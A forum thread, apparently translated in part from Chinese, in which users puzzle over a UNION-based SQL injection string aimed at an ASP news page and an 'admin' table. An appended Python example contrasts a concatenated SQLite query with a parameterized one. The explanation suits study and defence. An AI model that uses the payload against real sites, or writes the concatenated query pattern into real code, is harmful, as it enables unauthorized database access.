/news.asp?news_id=3
and 1=2 union all select
chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97),1,1,1,1
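from admin where 1=1 and 1=1
This statement is a union statement, right?
But why does it use so many + signs, and then commas as well? How is that explained? I don't understand. So confused.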
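A union query.
chr, no idea what that thing is; the 1,1,1,1 should be there to match the columns.
I guess these were originally variables, for example 'where '+@a+'=1 and '+@b+'=1', and this query just happens to have @a='1' @b='1'
I don't know what the point of writing so many A's is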
and 1=2 union all select --1=2为否,关系为and,所以前面执行不了,
--使用union all 把结果集串联,合并起来,这里前面结是集为空,所以是后面的结果集了
chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97),1,1,1,1 --1,为列值
from admin where 1=1 and 1=1 --条件 可能
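
The behaviour discussed in this thread, as an added example that is not part of any post: a query built by string concatenation beside its parameterized form, run against SQLite in memory. The `news` columns, the sample rows and all function names are constructed assumptions, and SQLite's `char()` and `||` stand in for the `chr()` and `+` of the dialect in the question.

```python
import sqlite3

def make_db():
    # Constructed sample data. Only the `admin` table name and the value 3
    # come from the thread; every column name here is an assumption.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table news (id integer, title text, a int, b int, c int);
        insert into news values (3, 'real headline', 0, 0, 0);
        create table admin (name text);
        insert into admin values ('root');
    """)
    return db

# Same shape as the statement in the question, shortened to three characters.
# char(97) is the letter 'a'; || joins the pieces into one string value, and
# the commas separate the five columns of the second SELECT.
PAYLOAD = ("3 and 1=2 union all select char(97)||char(97)||char(97),1,1,1,1 "
           "from admin where 1=1 and 1=1")

def news_concat(db, news_id):
    # Vulnerable: the request value becomes part of the SQL text.
    return db.execute("select * from news where id=" + news_id).fetchall()

def news_param(db, news_id):
    # Hardened: the value is bound as data and is never parsed as SQL.
    return db.execute("select * from news where id=?", (news_id,)).fetchall()

def column_mismatch_error(db):
    # Four columns against the five of `news`: both sides of a UNION must
    # return the same number of columns, which is what the 1,1,1,1 pads out.
    try:
        news_concat(db, "3 and 1=2 union all select 1,1,1,1 from admin")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", news_concat(db, PAYLOAD))
    print("parameterized:", news_param(db, PAYLOAD))
    print("normal id    :", news_param(db, "3"))
    print("4 columns    :", column_mismatch_error(db))
```

With concatenation the real news row disappears (`1=2` is false) and the constant row from the second SELECT is returned in its place; with the bound parameter the same input matches nothing.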